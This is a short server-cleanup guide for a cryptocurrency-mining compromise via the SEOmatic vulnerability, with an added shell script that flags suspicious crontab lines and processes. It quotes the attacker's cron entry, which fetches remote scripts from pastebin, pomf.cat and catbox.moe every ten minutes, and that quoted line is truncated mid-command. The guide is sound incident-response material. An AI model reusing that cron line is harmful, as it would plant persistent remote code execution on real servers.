The following is an outline of the steps provided by Nevin Lyne from Arcustech to fix a server that's been compromised by the SEOmatic security vulnerability. These instructions are specific to servers that were hacked to be used for cryptocurrency mining. YMMV.
cd /tmp/systemd-private-e6cc411e8b01426e9d739a74be0a1e12-systemd-timesyncd.service-tmNLjm/tmp
rm watohdog
rm config.json
ps ax | grep watohdog
kill -9 [process_id]
readlink -f /proc/[process_id]/exe
crontab -e
):
*/10 * * * * (curl -fsSL https://pastebin.com/raw/sRj0Lc8C||wget -q -O https://pastebin.com/raw/sRj0Lc8C||curl -fsSL https://a.pomf.cat/rxxypc.sh||wget -q -O - https://a.pomf.cat/rxxypc.sh||curl -fsSLk https://files.catbox.moe/6uvjoq.sh||wget -q -O
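
The checks above (find the process, resolve its executable, inspect the crontab) can be scripted for triage. This is an added example, not part of Nevin Lyne's original instructions; the function names, the extra temp directories (`/var/tmp`, `/dev/shm`) and the sample crontab with placeholder hosts are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original outline): triage helpers.

# Print crontab entries (read from stdin) that call curl or wget against an
# http(s) URL. Commented-out and blank lines are ignored.
flag_cron_downloaders() {
    grep -v '^[[:space:]]*#' | grep -E '(curl|wget)[^#]*https?://' || true
}

# Return 0 if a resolved /proc/PID/exe path looks suspicious: the binary runs
# from a world-writable temp location or was deleted from disk after launch.
exe_is_suspicious() {
    case "$1" in
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
        *" (deleted)") return 0 ;;
        *) return 1 ;;
    esac
}

# Walk /proc and list "PID<TAB>path" for every suspicious executable.
# Run as root to see all processes; unreadable entries are skipped.
scan_procs() {
    for link in /proc/[0-9]*/exe; do
        target=$(readlink "$link" 2>/dev/null) || continue
        if exe_is_suspicious "$target"; then
            pid=${link#/proc/}; pid=${pid%/exe}
            printf '%s\t%s\n' "$pid" "$target"
        fi
    done
}

# Constructed sample crontab; hosts are placeholders, not values from the page.
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * (curl -fsSL https://paste.example.invalid/raw/AAAA||wget -q -O - https://paste.example.invalid/raw/AAAA)
# */5 * * * * wget http://old.example.invalid/x.sh
15 4 * * 0 /usr/bin/certbot renew --quiet
EOF
}

sample_crontab | flag_cron_downloaders   # demo on the constructed sample
scan_procs                               # live check of the current host
```

On a real host, feed it each account's crontab, for example `crontab -l -u www-data | flag_cron_downloaders`, and review every hit by hand before deleting anything.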
<aside> It's worth noting that, so far, all signs are pointing to these steps effectively scrubbing the server of any nastiness that was installed. But the only way to be absolutely sure the server is clean and that your data and users are safe is to start fresh with a new server or restore from a full system snapshot taken before the exploit happened.
</aside>